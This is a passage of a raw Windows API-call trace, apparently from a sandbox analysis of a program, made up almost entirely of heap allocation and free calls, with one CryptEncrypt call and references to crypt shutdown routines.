hHeap=0x970000) returned 1 [0184.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0184.609] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf0728*, pdwDataLen=0x8cef60*=0x106d5, dwBufLen=0x106d8 | out: pbData=0x3bf0728*, pdwDataLen=0x8cef60*=0x106d8) returned 1 [0184.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0184.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0184.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0184.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0184.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0184.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0184.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0184.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0184.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0184.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0184.615] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0184.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0184.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0184.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0184.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0184.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0184.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0184.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0184.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c00e08 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0184.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0184.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c114e8 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c00e08 | out: hHeap=0x970000) returned 1 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0184.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0184.656] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.656] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0184.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0184.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0184.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0184.657] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0184.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0184.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0184.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0184.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0184.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0184.658] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.658] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 